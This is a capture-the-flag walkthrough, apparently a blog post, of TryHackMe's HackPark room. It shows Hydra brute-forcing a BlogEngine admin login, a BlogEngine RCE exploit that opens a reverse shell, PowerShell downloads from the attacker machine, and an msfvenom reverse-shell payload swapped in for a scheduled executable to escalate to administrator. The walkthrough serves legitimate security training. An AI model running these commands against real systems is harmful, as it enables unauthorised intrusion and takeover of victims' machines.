9 minute read

Machine Information


HackPark is a medium difficulty room on TryHackMe. Running on Windows 2012 R2 Server, this room covers brute forcing a web applications admin credentials. From there we use a known exploit to gain an initial shell. Then we enumerate the machine to find installed software which also has known exploits, we then use this to escalate to administrator.

Skills required are knowledge enumerating ports, services and file systems. Skills learned are using Hydra to brute force a web application, and researching exploits to use on discovered vulnerabilities.

Hosting Site TryHackMe
Link To Machine THM - Medium - HackPark
Machine Release Date 6th August 2019
Date I Completed It 1st February 2021
Distribution Used Kali 2020.3 – Release Info

Initial Recon

As always, let’s start with Nmap to check for open ports:

kali@kali:~/thm/hackpark$ nmap -sC -sV -Pn

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-30 16:06 GMT
Nmap scan report for
Host is up (0.033s latency).
Not shown: 998 filtered ports
80/tcp   open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods: 
|_  Potentially risky methods: TRACE
| http-robots.txt: 6 disallowed entries 
| /Account/*.* /search /search.aspx /error404.aspx 
|_/archive /archive.aspx
|_http-server-header: Microsoft-IIS/8.5
|_http-title: hackpark | hackpark amusements
3389/tcp open  ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=hackpark
| Not valid before: 2020-10-01T21:12:23
|_Not valid after:  2021-04-02T21:12:23
|_ssl-date: 2021-01-30T16:07:21+00:00; 0s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Just a couple open, let’s try port 80 first:


Task 1

We find a basic BlogEngine based site with a single post. The clown will be familiar to any one who has seen Stephen King’s IT.

A quote from IMDB helps with the first question:

The most striking thing about the film was Tim Curry's iconic, creepy performance as Pennywise, the murderous clown.

Looking around we find just one post created by the user Administrator. Hovering over that link shows us a potential user name of Admin:


Top right of the page we find a drop down menu which links us to a login page:


Task 2

We fire up BurpSuite to analyze the traffic, then attempt to login in with username admin and password admin:


The login failed but we captured the traffic in Burp:


We can see the request was a POST which helps with task 2. We can also see the data that was sent in the login request in the __VIEWSTATE= section at the bottom.

Using what we now know we can try to brute force our way in using Hydra:

kali@kali:~/thm/hackpark$ hydra -v -l admin -P /usr/share/wordlists/rockyou.txt http-post-form "/Account/login.aspx:__VIEWSTATE=v2%2FpJf5g0ju42LmZjbFdycrJfqFRSYkfOeJv79XeFKiaHtyhjCJjBQm1e9%2FRbOLxqHnKaQArzfzFSAs%2BB5yFhKneHbgLcTy2s9BkQahPVGqJN64Bm5RKsjOGVbzkCjudOIBh%2BfiJAqTbe71eFBWNclsZyPv7QSI67TEU7zwWHapnLQ9K3wyYD0ePtW5g9Iu9u4SWan8B5cB%2Fqq%2FcLP%2FMEXyfeW%2Fgo30FHMuQhhTPj0a%2BOGdWlsUW6l0tIMSnHIb0cMHicQoK8SJ%2BiwqCrr5Tx8gPrSPbJr%2BB%2FZnpS7yo6B%2Frvon2P9GjeUH9v7JnjNhQJdd1ZN4IkXUtHgr667K2i59pL68rQ7qh%2Bvo7fc8tlXSnvp9B&__EVENTVALIDATION=RnYbEyzGTU2QAUGmkxHo4YsUdSsZDJuXW6HD97WnUyh0jLqmpusHutkSu1kwFAQ8ngHp89xLzPrswQvsP%2BaggtUD5JbMnL2WJVHdDOySSuHq0jKT6IeISlH2JhdbV1SaS4wji37q96RuvkTbQpBS%2BEh9JSd%2FmnhA64WN1sQaG0X4Zon6&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login Failed"

In the above we have the used the following:

Username = admin
Wordlist for passwords = rockyou.txt
IP of the target server =
Type of attack = http-post-form
Page to attack = /account/login.aspx
Session info gathered from Burp = __VIEWSTATE=v2%2FpJf5g0ju42LmZjbFdycrJfqFRSYkfOeJv79XeFKiaHtyhjCJjBQm1e9%2FRbOLxqHnKaQArzfzFSAs%2BB5yFhKneHbgLcTy2s9BkQahPVGqJN64Bm5RKsjOGVbzkCjudOIBh%2BfiJAqTbe71eFBWNclsZyPv7QSI67TEU7zwWHapnLQ9K3wyYD0ePtW5g9Iu9u4SWan8B5cB%2Fqq%2FcLP%2FMEXyfeW%2Fgo30FHMuQhhTPj0a%2BOGdWlsUW6l0tIMSnHIb0cMHicQoK8SJ%2BiwqCrr5Tx8gPrSPbJr%2BB%2FZnpS7yo6B%2Frvon2P9GjeUH9v7JnjNhQJdd1ZN4IkXUtHgr667K2i59pL68rQ7qh%2Bvo7fc8tlXSnvp9B&__EVENTVALIDATION=RnYbEyzGTU2QAUGmkxHo4YsUdSsZDJuXW6HD97WnUyh0jLqmpusHutkSu1kwFAQ8ngHp89xLzPrswQvsP%2BaggtUD5JbMnL2WJVHdDOySSuHq0jKT6IeISlH2JhdbV1SaS4wji37q96RuvkTbQpBS%2BEh9JSd%2FmnhA64WN1sQaG0X4Zon6&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in
Failed login message so we can detect when we have a success = :Login Failed

Hydra gets to work trying each password from the wordlist and quickly finds the correct one:

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-30 16:47:47
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login Failed
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[VERBOSE] Page redirected to
[80][http-post-form] host:   login: admin   password: 1qaz2wsx
[STATUS] attack finished for (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-01-30 16:48:30

Task 3

We have the user and admin credentials and can login to get to the dashboard:


Clicking on about helps us with task 3:


A look around doesn’t present anything immediately obvious, let’s check Exploit-DB via searchsploit:

kali@kali:~/thm/hackpark$ searchsploit blogengine
------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                            |  Path
------------------------------------------------------------------------------------------ ---------------------------------
BlogEngine 3.3 - 'syndication.axd' XML External Entity Injection                          | xml/webapps/48422.txt
BlogEngine 3.3 - XML External Entity Injection                                            | windows/webapps/46106.txt
BlogEngine 3.3.8 - 'Content' Stored XSS                                                   | aspx/webapps/48999.txt
BlogEngine.NET 1.4 - 'search.aspx' Cross-Site Scripting                                   | asp/webapps/32874.txt
BlogEngine.NET 1.6 - Directory Traversal / Information Disclosure                         | asp/webapps/35168.txt
BlogEngine.NET 3.3.6 - Directory Traversal / Remote Code Execution                        | aspx/webapps/46353.cs
BlogEngine.NET 3.3.6/3.3.7 - 'dirPath' Directory Traversal / Remote Code Execution        | aspx/webapps/47010.py
BlogEngine.NET 3.3.6/3.3.7 - 'path' Directory Traversal                                   | aspx/webapps/47035.py
BlogEngine.NET 3.3.6/3.3.7 - 'theme Cookie' Directory Traversal / Remote Code Execution   | aspx/webapps/47011.py
BlogEngine.NET 3.3.6/3.3.7 - XML External Entity Injection                                | aspx/webapps/47014.py
------------------------------------------------------------------------------------------ ---------------------------------

We have what looks to be a possible RCE exploit for our version of BlogEngine:

BlogEngine.NET 3.3.6 - Directory Traversal / Remote Code Execution                        | aspx/webapps/46353.cs

Let’s download it and have a look:

kali@kali:~/thm/hackpark$ searchsploit -m aspx/webapps/46353.cs
  Exploit: BlogEngine.NET 3.3.6 - Directory Traversal / Remote Code Execution
      URL: https://www.exploit-db.com/exploits/46353
     Path: /usr/share/exploitdb/exploits/aspx/webapps/46353.cs
File Type: HTML document, ASCII text, with CRLF line terminators
Copied to: /home/kali/46353.cs  

Reading the exploit it looks to be fairly simple. We just need to edit this line and put our attack machine IP and port we will have NetCat listening on:

using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("", 4445)) {

Then we go to blog post when logged in as admin and now have an edit option:


Click on the file manager button:


Rename my exploit to Postview.asc and upload:


Now save the updated post:


Back on Kali we set a NetCat session listening:

root@kali:/home/kali/thm/hackpark# nc -nlvp 1234
listening on [any] 1234 ...

Then as described in the exploit we browse to the URL mentioned:


When we switch back to NetCat, and we have a connection:

root@kali:/home/kali/thm/hackpark# nc -nlvp 1234
listening on [any] 1234 ...
connect to [] from (UNKNOWN) [] 49708
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

First lets see who we are connected as, which will help with task 3:

iis apppool\blog

Privilege escalation

For Windows boxes the quickest way to find interesting areas to look further in to is using an enumeration script. A few different ones exist but let’s go with winPEAS as described in the room:

kali@kali:~/thm/hackpark$ wget https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/winPEAS/winPEASexe/winPEAS/bin/x64/Release/winPEAS.exe

We need a web server running on Kali so we can pull files from it to the HackPark server where we have our initial shell:

kali@kali:~/thm/hackpark$ python3 -m http.server

CD in to the temp folder which is writeable by everyone, then use PowerShell to pull winPEAS over:

C:\Windows\temp> PowerShell Invoke-WebRequest -Uri -Outfile winpeas.exe

There is a lot of output to go through. Eventually we find this section:

  ========================================(Services Information)========================================
  [+] Interesting Services -non Microsoft-
   [?] Check if you can overwrite some service binary or perform a DLL hijacking, also check for unquoted paths https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
    Amazon EC2Launch(Amazon Web Services, Inc. - Amazon EC2Launch)["C:\Program Files\Amazon\EC2Launch\EC2Launch.exe" service] - Auto - Stopped
    Amazon EC2Launch
    AmazonSSMAgent(Amazon SSM Agent)["C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe"] - Auto - Running
    Amazon SSM Agent
    AWSLiteAgent(Amazon Inc. - AWS Lite Guest Agent)[C:\Program Files\Amazon\XenTools\LiteAgent.exe] - Auto - Running - No quotes and Space detected
    AWS Lite Guest Agent
    Ec2Config(Amazon Web Services, Inc. - Ec2Config)["C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe"] - Auto - Running - isDotNet
    Ec2 Configuration Service
    PsShutdownSvc(Systems Internals - PsShutdown)[C:\Windows\PSSDNSVC.EXE] - Manual - Stopped
    WindowsScheduler(Splinterware Software Solutions - System Scheduler Service)[C:\PROGRA~2\SYSTEM~1\WService.exe] - Auto - Running
    File Permissions: Everyone [WriteData/CreateFiles]
    Possible DLL Hijacking in binary folder: C:\Program Files (x86)\SystemScheduler (Everyone [WriteData/CreateFiles])
    System Scheduler Service Wrapper

The last one above say possible DLL hijack. That sounds interesting, and we find this on Exploit-DB: Splinterware System Scheduler Pro 5.12 - Privilege Escalation

Task 4

We see the name of the service running is WindowsScheduler, which helps us with task 4.

Looking in the SystemScheduler folder indicated by winPEAS we see a couple of files with a current date and time, plus a directory called Events:

C:\Program Files (x86)\SystemScheduler>dir
 Volume in drive C has no label.
 Volume Serial Number is 0E97-C552
 Directory of C:\Program Files (x86)\SystemScheduler
08/04/2019  03:37 AM    <DIR>          .
08/04/2019  03:37 AM    <DIR>          ..
05/17/2007  12:47 PM             1,150 alarmclock.ico
08/31/2003  11:06 AM               766 clock.ico
08/31/2003  11:06 AM            80,856 ding.wav
02/01/2021  02:02 PM    <DIR>          Events
08/04/2019  03:36 AM                60 Forum.url
01/08/2009  07:21 PM         1,637,972 libeay32.dll
11/15/2004  11:16 PM             9,813 License.txt
02/01/2021  01:27 PM             1,496 LogFile.txt
02/01/2021  01:27 PM             3,760 LogfileAdvanced.txt
03/25/2018  09:58 AM           536,992 Message.exe
03/25/2018  09:59 AM           445,344 PlaySound.exe
03/25/2018  09:58 AM            27,040 PlayWAV.exe

Checking the files doesn’t reveal anything, but looking in the Events directory we see a few more files with current dates and times:

C:\Program Files (x86)\SystemScheduler>cd events
C:\Program Files (x86)\SystemScheduler\Events>dir
 Directory of C:\Program Files (x86)\SystemScheduler\Events
02/01/2021  02:04 PM             1,926 20198415519.INI
02/01/2021  02:04 PM            22,730 20198415519.INI_LOG.txt
10/02/2020  01:50 PM               290 2020102145012.INI
02/01/2021  01:58 PM               186 Administrator.flg
02/01/2021  01:27 PM                 0 Scheduler.flg

Looking at the txt file we find a process is stopped and started every 30 seconds by the administrator:

type 20198415519.INI_LOG.txt 
C:\Program Files (x86)\SystemScheduler\Events>type 20198415519.INI_LOG.txt
08/04/19 15:06:01,Event Started Ok, (Administrator)
08/04/19 15:06:30,Process Ended. PID:2608,ExitCode:1,Message.exe (Administrator)
08/04/19 15:07:00,Event Started Ok, (Administrator)
08/04/19 15:07:34,Process Ended. PID:2680,ExitCode:4,Message.exe (Administrator)
08/04/19 15:08:00,Event Started Ok, (Administrator)
08/04/19 15:08:33,Process Ended. PID:2768,ExitCode:4,Message.exe (Administrator)
08/04/19 15:09:00,Event Started Ok, (Administrator)
08/04/19 15:09:34,Process Ended. PID:3024,ExitCode:4,Message.exe (Administrator)
08/04/19 15:10:00,Event Started Ok, (Administrator)
08/04/19 15:10:33,Process Ended. PID:1556,ExitCode:4,Message.exe (Administrator)

Putting together what we’ve found so far we can see we have an executable called Message.exe being executed by administrator in a directory that has Everyone [WriteData/CreateFiles] permissions. So our escalation path is clear, we just need to switch Message.exe for our own reverse shell exe.

First let’s create a shell using MSFVenom in our webserver folder so we can grab it from the box:

kali@kali:~$ msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT=1337 -f exe -o Message.exe

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: Message.exe

Start a new terminal window and start NetCat listening:

kali@kali:~/thm/hackpark$ nc -nlvp 1337
listening on [any] 1337 ...

Now go back to the box and move the existing Message.exe out of the way and pull our reverse shell across to replace it:

C:\Program Files (x86)\SystemScheduler>rename Message.exe Message.old
C:\Program Files (x86)\SystemScheduler>powershell Invoke-WebRequest -Uri -Outfile Message.exe
C:\Program Files (x86)\SystemScheduler>dir
 Directory of C:\Program Files (x86)\SystemScheduler
05/17/2007  12:47 PM             1,150 alarmclock.ico
08/31/2003  11:06 AM               766 clock.ico
08/31/2003  11:06 AM            80,856 ding.wav
02/01/2021  02:16 PM    <DIR>          Events
08/04/2019  03:36 AM                60 Forum.url
01/08/2009  07:21 PM         1,637,972 libeay32.dll
11/15/2004  11:16 PM             9,813 License.txt
02/01/2021  01:27 PM             1,496 LogFile.txt
02/01/2021  01:27 PM             3,760 LogfileAdvanced.txt
02/01/2021  02:17 PM             7,168 Message.exe
03/25/2018  09:58 AM           536,992 Message.old

After a small wait we get a connection as root:

kali@kali:~/thm/hackpark$ nc -nlvp 1337
listening on [any] 1337 ...
connect to [] from (UNKNOWN) [] 49523
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

Now we can get the information needed to complete the questions for the room. Systemsinfo gives us a couple:


Host Name:                 HACKPARK
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00252-70000-00000-AA886
Original Install Date:     8/3/2019, 10:43:23 AM
System Boot Time:          2/1/2021, 1:26:29 PM
System Manufacturer:       Xen
System Model:              HVM domU
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.

We can also get the user flag from Jeffs desktop, and the root one from the admin desktop:

C:\>cd users\jeff\desktop
 Volume in drive C has no label.
 Volume Serial Number is 0E97-C552
 Directory of C:\Users\jeff\Desktop
08/04/2019  10:57 AM                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)  39,121,526,784 bytes free

C:\Users\jeff\Desktop>type user.txt

C:\Users\jeff\Desktop>cd ..\..\administrator\desktop
 Volume in drive C has no label.
 Volume Serial Number is 0E97-C552
 Directory of C:\Users\Administrator\Desktop
08/04/2019  10:51 AM                32 root.txt
08/04/2019  03:36 AM             1,029 System Scheduler.lnk
               2 File(s)          1,061 bytes
               2 Dir(s)  39,121,526,784 bytes free

C:\Users\Administrator\Desktop>type root.txt

Hopefully you enjoyed this fun room as much as I did!

For now we are all done. See you next time.